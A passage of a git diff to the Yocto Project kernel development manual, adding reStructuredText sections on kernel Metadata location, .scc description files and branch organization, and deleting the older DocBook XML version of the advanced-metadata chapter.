+Consider the "minnow" description for the "standard" kernel type (i.e.
+``minnow-standard.scc``):
+::
+
+   define KMACHINE minnow
+   define KTYPE standard
+   define KARCH i386
+
+   include ktypes/standard
+
+   include minnow.scc
+
+   # Extra minnow configs above the minimal defined in minnow.scc
+   include cfg/efi-ext.scc
+   include features/media/media-all.scc
+   include features/sound/snd_hda_intel.scc
+
+   # The following should really be in standard.scc
+   # USB live-image support
+   include cfg/usb-mass-storage.scc
+   include cfg/boot-live.scc
+
+   # Basic profiling
+   include features/latencytop/latencytop.scc
+   include features/profiling/profiling.scc
+
+   # Requested drivers that don't have an existing scc
+   kconf hardware minnow-drivers-extra.cfg
+
+The ``include`` command midway through the file includes the ``minnow.scc`` description
+that defines all enabled hardware for the BSP that is common to all
+kernel types. Using this command significantly reduces duplication.
+
+Now consider the "minnow" description for the "tiny" kernel type (i.e.
+``minnow-tiny.scc``):
+::
+
+   define KMACHINE minnow
+   define KTYPE tiny
+   define KARCH i386
+
+   include ktypes/tiny
+
+   include minnow.scc
+
+As you might expect,
+the "tiny" description includes quite a bit less. In fact, it includes
+only the minimal policy defined by the "tiny" kernel type and the
+hardware-specific configuration required for booting the machine along
+with the most basic functionality of the system as defined in the base
+"minnow" description file.
+
+Notice again the three critical variables:
+:term:`KMACHINE`,
+:term:`KTYPE`, and
+:term:`KARCH`. Of these variables, only
+``KTYPE`` has changed to specify the "tiny" kernel type.
+
+Kernel Metadata Location
+========================
+
+Kernel Metadata always exists outside of the kernel tree either defined
+in a kernel recipe (recipe-space) or outside of the recipe. Where you
+choose to define the Metadata depends on what you want to do and how you
+intend to work. Regardless of where you define the kernel Metadata, the
+syntax used applies equally.
+
+If you are unfamiliar with the Linux kernel and only wish to apply a
+configuration and possibly a couple of patches provided to you by
+others, the recipe-space method is recommended. This method is also a
+good approach if you are working with Linux kernel sources you do not
+control or if you just do not want to maintain a Linux kernel Git
+repository on your own. For partial information on how you can define
+kernel Metadata in the recipe-space, see the
+":ref:`kernel-dev/kernel-dev-common:modifying an existing recipe`" section.
+
+Conversely, if you are actively developing a kernel and are already
+maintaining a Linux kernel Git repository of your own, you might find it
+more convenient to work with kernel Metadata kept outside the
+recipe-space. Working with Metadata in this area can make iterative
+development of the Linux kernel more efficient outside of the BitBake
+environment.
+
+Recipe-Space Metadata
+---------------------
+
+When stored in recipe-space, the kernel Metadata files reside in a
+directory hierarchy below
+:term:`FILESEXTRAPATHS`. For
+a linux-yocto recipe or for a Linux kernel recipe derived by copying and
+modifying
+``oe-core/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb`` to
+a recipe in your layer, ``FILESEXTRAPATHS`` is typically set to
+``${``\ :term:`THISDIR`\ ``}/${``\ :term:`PN`\ ``}``.
+See the ":ref:`kernel-dev/kernel-dev-common:modifying an existing recipe`"
+section for more information.
+
+Here is an example that shows a trivial tree of kernel Metadata stored
+in recipe-space within a BSP layer:
+::
+
+   meta-my_bsp_layer/
+   `-- recipes-kernel
+       `-- linux
+           `-- linux-yocto
+               |-- bsp-standard.scc
+               |-- bsp.cfg
+               `-- standard.cfg
+
+When the Metadata is stored in recipe-space, you must take steps to
+ensure BitBake has the necessary information to decide what files to
+fetch and when they need to be fetched again. It is only necessary to
+specify the ``.scc`` files on the
+:term:`SRC_URI`. BitBake parses them
+and fetches any files referenced in the ``.scc`` files by the
+``include``, ``patch``, or ``kconf`` commands. Because of this, it is
+necessary to bump the recipe :term:`PR`
+value when changing the content of files not explicitly listed in the
+``SRC_URI``.
+
+If the BSP description is in recipe space, you cannot simply list the
+``*.scc`` in the ``SRC_URI`` statement. You need to use the following
+form from your kernel append file:
+::
+
+   SRC_URI_append_myplatform = " \
+       file://myplatform;type=kmeta;destsuffix=myplatform \
+       "
+
+Metadata Outside the Recipe-Space
+---------------------------------
+
+When stored outside of the recipe-space, the kernel Metadata files
+reside in a separate repository. The OpenEmbedded build system adds the
+Metadata to the build as a "type=kmeta" repository through the
+:term:`SRC_URI` variable. As an
+example, consider the following ``SRC_URI`` statement from the
+``linux-yocto_4.12.bb`` kernel recipe:
+::
+
+   SRC_URI = "git://git.yoctoproject.org/linux-yocto-4.12.git;name=machine;branch=${KBRANCH}; \
+              git://git.yoctoproject.org/yocto-kernel-cache;type=kmeta;name=meta;branch=yocto-4.12;destsuffix=${KMETA}"
+
+
+``${KMETA}``, in this context, is simply used to name the directory into
+which the Git fetcher places the Metadata. This behavior is no different
+than any multi-repository ``SRC_URI`` statement used in a recipe (e.g.
+see the previous section).
+
+You can keep kernel Metadata in a "kernel-cache", which is a directory
+containing configuration fragments. As with any Metadata kept outside
+the recipe-space, you simply need to use the ``SRC_URI`` statement with
+the "type=kmeta" attribute. Doing so makes the kernel Metadata available
+during the configuration phase.
+
+If you modify the Metadata, you must not forget to update the ``SRCREV``
+statements in the kernel's recipe. In particular, you need to update the
+``SRCREV_meta`` variable to match the commit in the ``KMETA`` branch you
+wish to use. Changing the data in these branches and not updating the
+``SRCREV`` statements to match will cause the build to fetch an older
+commit.
+
+Organizing Your Source
+======================
+
+Many recipes based on the ``linux-yocto-custom.bb`` recipe use Linux
+kernel sources that have only a single branch - "master". This type of
+repository structure is fine for linear development supporting a single
+machine and architecture. However, if you work with multiple boards and
+architectures, a kernel source repository with multiple branches is more
+efficient. For example, suppose you need a series of patches for one
+board to boot. Sometimes, these patches are works-in-progress or
+fundamentally wrong, yet they are still necessary for specific boards.
+In these situations, you most likely do not want to include these
+patches in every kernel you build (i.e. have the patches as part of the
+lone "master" branch). It is situations like these that give rise to
+multiple branches used within a Linux kernel sources Git repository.
+
+Repository organization strategies exist that maximize source reuse,
+remove redundancy, and logically order your changes. This section
+presents strategies for the following cases:
+
+-  Encapsulating patches in a feature description and only including the
+   patches in the BSP descriptions of the applicable boards.
+
+-  Creating a machine branch in your kernel source repository and
+   applying the patches on that branch only.
+
+-  Creating a feature branch in your kernel source repository and
+   merging that branch into your BSP when needed.
+
+The approach you take is entirely up to you and depends on what works
+best for your development model.
+
+Encapsulating Patches
+---------------------
+
+If you are reusing patches from an external tree and are not working on
+the patches, you might find the encapsulated feature to be appropriate.
+Given this scenario, you do not need to create any branches in the
+source repository. Rather, you just take the static patches you need and
+encapsulate them within a feature description. Once you have the feature
+description, you simply include that into the BSP description as
+described in the "`BSP Descriptions <#bsp-descriptions>`__" section.
+
+You can find information on how to create patches and BSP descriptions
+in the "`Patches <#patches>`__" and "`BSP
+Descriptions <#bsp-descriptions>`__" sections.
+
+Machine Branches
+----------------
+
+When you have multiple machines and architectures to support, or you are
+actively working on board support, it is more efficient to create
+branches in the repository based on individual machines. Having machine
+branches allows common source to remain in the "master" branch with any
+features specific to a machine stored in the appropriate machine branch.
+This organization method frees you from continually reintegrating your
+patches into a feature.
+
+Once you have a new branch, you can set up your kernel Metadata to use
+the branch a couple different ways. In the recipe, you can specify the
+new branch as the ``KBRANCH`` to use for the board as follows:
+::
+
+   KBRANCH = "mynewbranch"
+
+Another method is to use the ``branch`` command in the BSP
+description:
+::
+
+   mybsp.scc:
+      define KMACHINE mybsp
+      define KTYPE standard
+      define KARCH i386
+      include standard.scc
+
+      branch mynewbranch
+
+      include mybsp-hw.scc
+
+If you find yourself with numerous branches, you might consider using a
+hierarchical branching system similar to what the Yocto Linux Kernel Git
+repositories use:
+::
+
+   common/kernel_type/machine
+
+If you had two kernel types, "standard" and "small" for instance, three
+machines, and common as ``mydir``, the branches in your Git repository
+might look like this:
+::
+
+   mydir/base
+   mydir/standard/base
+   mydir/standard/machine_a
+   mydir/standard/machine_b
+   mydir/standard/machine_c
+   mydir/small/base
+   mydir/small/machine_a
+
+This organization can help clarify the branch relationships. In this
+case, ``mydir/standard/machine_a`` includes everything in ``mydir/base``
+and ``mydir/standard/base``. The "standard" and "small" branches add
+sources specific to those kernel types that for whatever reason are not
+appropriate for the other branches.
+
+.. note::
+
+   The "base" branches are an artifact of the way Git manages its data
+   internally on the filesystem: Git will not allow you to use
+   ``mydir/standard`` and ``mydir/standard/machine_a`` because it would have to
+   create a file and a directory named "standard".
+
+Feature Branches
+----------------
+
+When you are actively developing new features, it can be more efficient
+to work with that feature as a branch, rather than as a set of patches
+that have to be regularly updated. The Yocto Project Linux kernel tools
+provide for this with the ``git merge`` command.
+
+To merge a feature branch into a BSP, insert the ``git merge`` command
+after any ``branch`` commands:
+::
+
+   mybsp.scc:
+      define KMACHINE mybsp
+      define KTYPE standard
+      define KARCH i386
+      include standard.scc
+
+      branch mynewbranch
+      git merge myfeature
+
+      include mybsp-hw.scc
+
+.. _scc-reference:
+
+SCC Description File Reference
+==============================
+
+This section provides a brief reference for the commands you can use
+within an SCC description file (``.scc``):
+
+-  ``branch [ref]``: Creates a new branch relative to the current branch
+   (typically ``${KTYPE}``) using the currently checked-out branch, or
+   "ref" if specified.
+
+-  ``define``: Defines variables, such as
+   :term:`KMACHINE`,
+   :term:`KTYPE`,
+   :term:`KARCH`, and
+   :term:`KFEATURE_DESCRIPTION`.
+
+-  ``include SCC_FILE``: Includes an SCC file in the current file. The
+   file is parsed as if you had inserted it inline.
+
+-  ``kconf [hardware|non-hardware] CFG_FILE``: Queues a configuration
+   fragment for merging into the final Linux ``.config`` file.
+
+-  ``git merge GIT_BRANCH``: Merges the feature branch into the current
+   branch.
+
+-  ``patch PATCH_FILE``: Applies the patch to the current Git branch.
+
+
diff --git a/documentation/kernel-dev/kernel-dev-advanced.xml b/documentation/kernel-dev/kernel-dev-advanced.xml
deleted file mode 100644
index 5c76ed2391..0000000000
--- a/documentation/kernel-dev/kernel-dev-advanced.xml
+++ /dev/null
@@ -1,1256 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='kernel-dev-advanced'>
-<title>Working with Advanced Metadata (<filename>yocto-kernel-cache</filename>)</title>
-
-<section id='kernel-dev-advanced-overview'>
-    <title>Overview</title>
-
-    <para>
-        In addition to supporting configuration fragments and patches, the
-        Yocto Project kernel tools also support rich
-        <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink> that you can
-        use to define complex policies and Board Support Package (BSP) support.
-        The purpose of the Metadata and the tools that manage it is
-        to help you manage the complexity of the configuration and sources
-        used to support multiple BSPs and Linux kernel types.
-    </para>
-
-    <para>
-        Kernel Metadata exists in many places.
-        One area in the Yocto Project
-        <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>
-        is the <filename>yocto-kernel-cache</filename> Git repository.
-        You can find this repository grouped under the "Yocto Linux Kernel"
-        heading in the
-        <ulink url='&YOCTO_GIT_URL;'>Yocto Project Source Repositories</ulink>.
-    </para>
-
-    <para>
-        Kernel development tools ("kern-tools") exist also in the Yocto
-        Project Source Repositories under the "Yocto Linux Kernel" heading
-        in the <filename>yocto-kernel-tools</filename> Git repository.
-        The recipe that builds these tools is
-        <filename>meta/recipes-kernel/kern-tools/kern-tools-native_git.bb</filename>
-        in the
-        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-        (e.g. <filename>poky</filename>).
-    </para>
-</section>
-
-<section id='using-kernel-metadata-in-a-recipe'>
-    <title>Using Kernel Metadata in a Recipe</title>
-
-    <para>
-        As mentioned in the introduction, the Yocto Project contains kernel
-        Metadata, which is located in the
-        <filename>yocto-kernel-cache</filename> Git repository.
-        This Metadata defines Board Support Packages (BSPs) that
-        correspond to definitions in linux-yocto recipes for corresponding BSPs.
-        A BSP consists of an aggregation of kernel policy and enabled
-        hardware-specific features.
-        The BSP can be influenced from within the linux-yocto recipe.
-        <note>
-            A Linux kernel recipe that contains kernel Metadata (e.g.
-            inherits from the <filename>linux-yocto.inc</filename> file)
-            is said to be a "linux-yocto style" recipe.
-        </note>
-    </para>
-
-    <para>
-        Every linux-yocto style recipe must define the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>
-        variable.
-        This variable is typically set to the same value as the
-        <filename>MACHINE</filename> variable, which is used by
-        <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>.
-        However, in some cases, the variable might instead refer to the
-        underlying platform of the <filename>MACHINE</filename>.
-    </para>
-
-    <para>
-        Multiple BSPs can reuse the same <filename>KMACHINE</filename>
-        name if they are built using the same BSP description.
-        Multiple Corei7-based BSPs could share the same "intel-corei7-64"
-        value for <filename>KMACHINE</filename>.
-        It is important to realize that <filename>KMACHINE</filename> is
-        just for kernel mapping, while <filename>MACHINE</filename>
-        is the machine type within a BSP Layer.
-        Even with this distinction, however, these two variables can hold
-        the same value.
-        See the <link linkend='bsp-descriptions'>BSP Descriptions</link>
-        section for more information.
-    </para>
-
-    <para>
-        Every linux-yocto style recipe must also indicate the Linux kernel
-        source repository branch used to build the Linux kernel.
-        The <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>
-        variable must be set to indicate the branch.
-        <note>
-            You can use the <filename>KBRANCH</filename> value to define an
-            alternate branch typically with a machine override as shown here
-            from the <filename>meta-yocto-bsp</filename> layer:
-            <literallayout class='monospaced'>
-     KBRANCH_edgerouter = "standard/edgerouter"
-            </literallayout>
-        </note>
-    </para>
-
-    <para>
-        The linux-yocto style recipes can optionally define the following
-        variables:
-        <literallayout class='monospaced'>
-     KERNEL_FEATURES
-     LINUX_KERNEL_TYPE
-        </literallayout>
-    </para>
-
-    <para>
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></ulink>
-        defines the kernel type to be
-        used in assembling the configuration.
-        If you do not specify a <filename>LINUX_KERNEL_TYPE</filename>,
-        it defaults to "standard".
-        Together with <filename>KMACHINE</filename>,
-        <filename>LINUX_KERNEL_TYPE</filename> defines the search
-        arguments used by the kernel tools to find the
-        appropriate description within the kernel Metadata with which to
-        build out the sources and configuration.
-        The linux-yocto recipes define "standard", "tiny", and "preempt-rt"
-        kernel types.
-        See the "<link linkend='kernel-types'>Kernel Types</link>" section
-        for more information on kernel types.
-    </para>
-
-    <para>
-        During the build, the kern-tools search for the BSP description
-        file that most closely matches the <filename>KMACHINE</filename>
-        and <filename>LINUX_KERNEL_TYPE</filename> variables passed in from the
-        recipe.
-        The tools use the first BSP description it finds that match
-        both variables.
-        If the tools cannot find a match, they issue a warning.
-    </para>
-
-    <para>
-        The tools first search for the <filename>KMACHINE</filename> and
-        then for the <filename>LINUX_KERNEL_TYPE</filename>.
-        If the tools cannot find a partial match, they will use the
-        sources from the <filename>KBRANCH</filename> and any configuration
-        specified in the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>.
-    </para>
-
-    <para>
-        You can use the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_FEATURES'><filename>KERNEL_FEATURES</filename></ulink>
-        variable
-        to include features (configuration fragments, patches, or both) that
-        are not already included by the <filename>KMACHINE</filename> and
-        <filename>LINUX_KERNEL_TYPE</filename> variable combination.
-        For example, to include a feature specified as
-        "features/netfilter/netfilter.scc",
-        specify:
-        <literallayout class='monospaced'>
-     KERNEL_FEATURES += "features/netfilter/netfilter.scc"
-        </literallayout>
-        To include a feature called "cfg/sound.scc" just for the
-        <filename>qemux86</filename> machine, specify:
-        <literallayout class='monospaced'>
-     KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc"
-        </literallayout>
-        The value of the entries in <filename>KERNEL_FEATURES</filename>
-        are dependent on their location within the kernel Metadata itself.
-        The examples here are taken from the
-        <filename>yocto-kernel-cache</filename> repository.
-        Each branch of this repository contains "features" and "cfg"
-        subdirectories at the top-level.
-        For more information, see the
-        "<link linkend='kernel-metadata-syntax'>Kernel Metadata Syntax</link>"
-        section.
-    </para>
-</section>
-
-<section id='kernel-metadata-syntax'>
-    <title>Kernel Metadata Syntax</title>
-
-    <para>
-        The kernel Metadata consists of three primary types of files:
-        <filename>scc</filename>
-        <footnote>
-            <para>
-                <filename>scc</filename> stands for Series Configuration
-                Control, but the naming has less significance in the
-                current implementation of the tooling than it had in the
-                past.
-                Consider <filename>scc</filename> files to be description files.
-            </para>
-        </footnote>
-        description files, configuration fragments, and patches.
-        The <filename>scc</filename> files define variables and include or
-        otherwise reference any of the three file types.
-        The description files are used to aggregate all types of kernel
-        Metadata into
-        what ultimately describes the sources and the configuration required
-        to build a Linux kernel tailored to a specific machine.
-    </para>
-
-    <para>
-        The <filename>scc</filename> description files are used to define two
-        fundamental types of kernel Metadata:
-        <itemizedlist>
-            <listitem><para>Features</para></listitem>
-            <listitem><para>Board Support Packages (BSPs)</para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        Features aggregate sources in the form of patches and configuration
-        fragments into a modular reusable unit.
-        You can use features to implement conceptually separate kernel
-        Metadata descriptions such as pure configuration fragments,
-        simple patches, complex features, and kernel types.
-        <link linkend='kernel-types'>Kernel types</link> define general
-        kernel features and policy to be reused in the BSPs.
-    </para>
-
-    <para>
-        BSPs define hardware-specific features and aggregate them with kernel
-        types to form the final description of what will be assembled and built.
-    </para>
-
-    <para>
-        While the kernel Metadata syntax does not enforce any logical
-        separation of configuration fragments, patches, features or kernel
-        types, best practices dictate a logical separation of these types
-        of Metadata.
-        The following Metadata file hierarchy is recommended:
-        <literallayout class='monospaced'>
-     <replaceable>base</replaceable>/
-        bsp/
-        cfg/
-        features/
-        ktypes/
-        patches/
-        </literallayout>
-    </para>
-
-    <para>
-        The <filename>bsp</filename> directory contains the
-        <link linkend='bsp-descriptions'>BSP descriptions</link>.
-        The remaining directories all contain "features".
-        Separating <filename>bsp</filename> from the rest of the structure
-        aids conceptualizing intended usage.
-    </para>
-
-    <para>
-        Use these guidelines to help place your <filename>scc</filename>
-        description files within the structure:
-        <itemizedlist>
-            <listitem><para>If your file contains
-                only configuration fragments, place the file in the
-                <filename>cfg</filename> directory.</para></listitem>
-            <listitem><para>If your file contains
-                only source-code fixes, place the file in the
-                <filename>patches</filename> directory.</para></listitem>
-            <listitem><para>If your file encapsulates
-                a major feature, often combining sources and configurations,
-                place the file in <filename>features</filename> directory.
-                </para></listitem>
-            <listitem><para>If your file aggregates
-                non-hardware configuration and patches in order to define a
-                base kernel policy or major kernel type to be reused across
-                multiple BSPs, place the file in <filename>ktypes</filename>
-                directory.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        These distinctions can easily become blurred - especially as
-        out-of-tree features slowly merge upstream over time.
-        Also, remember that how the description files are placed is
-        a purely logical organization and has no impact on the functionality
-        of the kernel Metadata.
-        There is no impact because all of <filename>cfg</filename>,
-        <filename>features</filename>, <filename>patches</filename>, and
-        <filename>ktypes</filename>, contain "features" as far as the kernel
-        tools are concerned.
-    </para>
-
-    <para>
-        Paths used in kernel Metadata files are relative to
-        <replaceable>base</replaceable>, which is either
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-        if you are creating Metadata in
-        <link linkend='recipe-space-metadata'>recipe-space</link>,
-        or the top level of
-        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/yocto-kernel-cache/tree/'><filename>yocto-kernel-cache</filename></ulink>
-        if you are creating
-        <link linkend='metadata-outside-the-recipe-space'>Metadata outside of the recipe-space</link>.
-    </para>
-
-    <section id='configuration'>
-        <title>Configuration</title>
-
-        <para>
-            The simplest unit of kernel Metadata is the configuration-only
-            feature.
-            This feature consists of one or more Linux kernel configuration
-            parameters in a configuration fragment file
-            (<filename>.cfg</filename>) and a <filename>.scc</filename> file
-            that describes the fragment.
-        </para>
-
-        <para>
-            As an example, consider the Symmetric Multi-Processing (SMP)
-            fragment used with the <filename>linux-yocto-4.12</filename>
-            kernel as defined outside of the recipe space (i.e.
-            <filename>yocto-kernel-cache</filename>).
-            This Metadata consists of two files: <filename>smp.scc</filename>
-            and <filename>smp.cfg</filename>.
-            You can find these files in the <filename>cfg</filename> directory
-            of the <filename>yocto-4.12</filename> branch in the
-            <filename>yocto-kernel-cache</filename> Git repository:
-            <literallayout class='monospaced'>
-     cfg/smp.scc:
-        define KFEATURE_DESCRIPTION "Enable SMP for 32 bit builds"
-        define KFEATURE_COMPATIBILITY all
-
-        kconf hardware smp.cfg
-
-     cfg/smp.cfg:
-        CONFIG_SMP=y
-        CONFIG_SCHED_SMT=y
-        # Increase default NR_CPUS from 8 to 64 so that platform with
-        # more than 8 processors can be all activated at boot time
-        CONFIG_NR_CPUS=64
-        # The following is needed when setting NR_CPUS to something
-        # greater than 8 on x86 architectures, it should be automatically
-        # disregarded by Kconfig when using a different arch
-        CONFIG_X86_BIGSMP=y
-            </literallayout>
-            You can find general information on configuration fragment files in
-            the
-            "<link linkend='creating-config-fragments'>Creating Configuration Fragments</link>"
-            section.
-        </para>
-
-        <para>
-            Within the <filename>smp.scc</filename> file, the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-KFEATURE_DESCRIPTION'><filename>KFEATURE_DESCRIPTION</filename></ulink>
-            statement provides a short description of the fragment.
-            Higher level kernel tools use this description.
-        </para>
-
-        <para>
-            Also within the <filename>smp.scc</filename> file, the
-            <filename>kconf</filename> command includes the
-            actual configuration fragment in an <filename>.scc</filename>
-            file, and the "hardware" keyword identifies the fragment as
-            being hardware enabling, as opposed to general policy,
-            which would use the "non-hardware" keyword.
-            The distinction is made for the benefit of the configuration
-            validation tools, which warn you if a hardware fragment
-            overrides a policy set by a non-hardware fragment.
-            <note>
-                The description file can include multiple
-                <filename>kconf</filename> statements, one per fragment.
-            </note>
-        </para>
-
-        <para>
-            As described in the
-            "<link linkend='validating-configuration'>Validating Configuration</link>"
-            section, you can use the following BitBake command to audit your
-            configuration:
-            <literallayout class='monospaced'>
-     $ bitbake linux-yocto -c kernel_configcheck -f
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='patches'>
-        <title>Patches</title>
-
-        <para>
-            Patch descriptions are very similar to configuration fragment
-            descriptions, which are described in the previous section.
-            However, instead of a <filename>.cfg</filename> file, these
-            descriptions work with source patches (i.e.
-            <filename>.patch</filename> files).
-        </para>
-
-        <para>
-            A typical patch includes a description file and the patch itself.
-            As an example, consider the build patches used with the
-            <filename>linux-yocto-4.12</filename> kernel as defined outside of
-            the recipe space (i.e. <filename>yocto-kernel-cache</filename>).
-            This Metadata consists of several files:
-            <filename>build.scc</filename> and a set of
-            <filename>*.patch</filename> files.
-            You can find these files in the <filename>patches/build</filename>
-            directory of the <filename>yocto-4.12</filename> branch in the
-            <filename>yocto-kernel-cache</filename> Git repository.
-        </para>
-
-        <para>
-            The following listings show the <filename>build.scc</filename>
-            file and part of the
-            <filename>modpost-mask-trivial-warnings.patch</filename> file:
-            <literallayout class='monospaced'>
-     patches/build/build.scc:
-        patch arm-serialize-build-targets.patch
-        patch powerpc-serialize-image-targets.patch
-        patch kbuild-exclude-meta-directory-from-distclean-processi.patch
-
-        # applied by kgit
-        # patch kbuild-add-meta-files-to-the-ignore-li.patch
-
-        patch modpost-mask-trivial-warnings.patch
-        patch menuconfig-check-lxdiaglog.sh-Allow-specification-of.patch
-
-     patches/build/modpost-mask-trivial-warnings.patch:
-        From bd48931bc142bdd104668f3a062a1f22600aae61 Mon Sep 17 00:00:00 2001
-        From: Paul Gortmaker &lt;paul.gortmaker@windriver.com&gt;
-        Date: Sun, 25 Jan 2009 17:58:09 -0500
-        Subject: [PATCH] modpost: mask trivial warnings
-
-        Newer HOSTCC will complain about various stdio fcns because
-                          .
-                          .
-                          .
- 	        char *dump_write = NULL, *files_source = NULL;
- 	        int opt;
-        --
-        2.10.1
-
-        generated by cgit v0.10.2 at 2017-09-28 15:23:23 (GMT)
-            </literallayout>
-            The description file can include multiple patch statements where
-            each statement handles a single patch.
-            In the example <filename>build.scc</filename> file, five patch
-            statements exist for the five patches in the directory.
-        </para>
-
-        <para>
-            You can create a typical <filename>.patch</filename> file using
-            <filename>diff -Nurp</filename> or
-            <filename>git format-patch</filename> commands.
-            For information on how to create patches, see the
-            "<link linkend='using-devtool-to-patch-the-kernel'>Using <filename>devtool</filename> to Patch the Kernel</link>"
-            and
-            "<link linkend='using-traditional-kernel-development-to-patch-the-kernel'>Using Traditional Kernel Development to Patch the Kernel</link>"
-            sections.
-        </para>
-    </section>
-
-    <section id='features'>
-        <title>Features</title>
-
-        <para>
-            Features are complex kernel Metadata types that consist
-            of configuration fragments, patches, and possibly other feature
-            description files.
-            As an example, consider the following generic listing:
-            <literallayout class='monospaced'>
-     features/<replaceable>myfeature</replaceable>.scc
-        define KFEATURE_DESCRIPTION "Enable <replaceable>myfeature</replaceable>"
-
-        patch 0001-<replaceable>myfeature</replaceable>-core.patch
-        patch 0002-<replaceable>myfeature</replaceable>-interface.patch
-
-        include cfg/<replaceable>myfeature</replaceable>_dependency.scc
-        kconf non-hardware <replaceable>myfeature</replaceable>.cfg
-            </literallayout>
-            This example shows how the <filename>patch</filename> and
-            <filename>kconf</filename> commands are used as well as
-            how an additional feature description file is included with
-            the <filename>include</filename> command.
-        </para>
-
-        <para>
-            Typically, features are less granular than configuration
-            fragments and are more likely than configuration fragments
-            and patches to be the types of things you want to specify
-            in the <filename>KERNEL_FEATURES</filename> variable of the
-            Linux kernel recipe.
-            See the "<link linkend='using-kernel-metadata-in-a-recipe'>Using Kernel Metadata in a Recipe</link>"
-            section earlier in the manual.
-        </para>
-    </section>
-
-    <section id='kernel-types'>
-        <title>Kernel Types</title>
-
-        <para>
-            A kernel type defines a high-level kernel policy by
-            aggregating non-hardware configuration fragments with
-            patches you want to use when building a Linux kernel of a
-            specific type (e.g. a real-time kernel).
-            Syntactically, kernel types are no different than features
-            as described in the "<link linkend='features'>Features</link>"
-            section.
-            The
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_KERNEL_TYPE'><filename>LINUX_KERNEL_TYPE</filename></ulink>
-            variable in the kernel recipe selects the kernel type.
-            For example, in the <filename>linux-yocto_4.12.bb</filename>
-            kernel recipe found in
-            <filename>poky/meta/recipes-kernel/linux</filename>, a
-            <ulink url='&YOCTO_DOCS_BB_URL;#require-inclusion'><filename>require</filename></ulink>
-            directive includes the
-            <filename>poky/meta/recipes-kernel/linux/linux-yocto.inc</filename>
-            file, which has the following statement that defines the default
-            kernel type:
-            <literallayout class='monospaced'>
-     LINUX_KERNEL_TYPE ??= "standard"
-            </literallayout>
-        </para>
-
-        <para>
-            Another example would be the real-time kernel (i.e.
-            <filename>linux-yocto-rt_4.12.bb</filename>).
-            This kernel recipe directly sets the kernel type as follows:
-            <literallayout class='monospaced'>
-     LINUX_KERNEL_TYPE = "preempt-rt"
-            </literallayout>
-            <note>
-                You can find kernel recipes in the
-                <filename>meta/recipes-kernel/linux</filename> directory of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                (e.g. <filename>poky/meta/recipes-kernel/linux/linux-yocto_4.12.bb</filename>).
-                See the "<link linkend='using-kernel-metadata-in-a-recipe'>Using Kernel Metadata in a Recipe</link>"
-                section for more information.
-            </note>
-        </para>
-
-        <para>
-            Three kernel types ("standard", "tiny", and "preempt-rt") are
-            supported for Linux Yocto kernels:
-            <itemizedlist>
-                <listitem><para>"standard":
-                    Includes the generic Linux kernel policy of the Yocto
-                    Project linux-yocto kernel recipes.
-                    This policy includes, among other things, which file
-                    systems, networking options, core kernel features, and
-                    debugging and tracing options are supported.
-                    </para></listitem>
-                <listitem><para>"preempt-rt":
-                    Applies the <filename>PREEMPT_RT</filename>
-                    patches and the configuration options required to
-                    build a real-time Linux kernel.
-                    This kernel type inherits from the "standard" kernel type.
-                    </para></listitem>
-                <listitem><para>"tiny":
-                    Defines a bare minimum configuration meant to serve as a
-                    base for very small Linux kernels.
-                    The "tiny" kernel type is independent from the "standard"
-                    configuration.
-                    Although the "tiny" kernel type does not currently include
-                    any source changes, it might in the future.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            For any given kernel type, the Metadata is defined by the
-            <filename>.scc</filename> (e.g. <filename>standard.scc</filename>).
-            Here is a partial listing for the <filename>standard.scc</filename>
-            file, which is found in the <filename>ktypes/standard</filename>
-            directory of the <filename>yocto-kernel-cache</filename> Git
-            repository:
-            <literallayout class='monospaced'>
-     # Include this kernel type fragment to get the standard features and
-     # configuration values.
-
-     # Note: if only the features are desired, but not the configuration
-     #       then this should be included as:
-     #             include ktypes/standard/standard.scc nocfg
-     #       if no chained configuration is desired, include it as:
-     #             include ktypes/standard/standard.scc nocfg inherit
-
-
-
-     include ktypes/base/base.scc
-     branch standard
-
-     kconf non-hardware standard.cfg
-
-     include features/kgdb/kgdb.scc
-                .
-                .
-                .
-
-     include cfg/net/ip6_nf.scc
-     include cfg/net/bridge.scc
-
-     include cfg/systemd.scc
-
-     include features/rfkill/rfkill.scc
-            </literallayout>
-        </para>
-
-        <para>
-            As with any <filename>.scc</filename> file, a
-            kernel type definition can aggregate other
-            <filename>.scc</filename> files with
-            <filename>include</filename> commands.
-            These definitions can also directly pull in
-            configuration fragments and patches with the
-            <filename>kconf</filename> and <filename>patch</filename>
-            commands, respectively.
-        </para>
-
-        <note>
-            It is not strictly necessary to create a kernel type
-            <filename>.scc</filename> file.
-            The Board Support Package (BSP) file can implicitly define
-            the kernel type using a <filename>define
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-KTYPE'>KTYPE</ulink> myktype</filename>
-            line.
-            See the "<link linkend='bsp-descriptions'>BSP Descriptions</link>"
-            section for more information.
-        </note>
-    </section>
-
-    <section id='bsp-descriptions'>
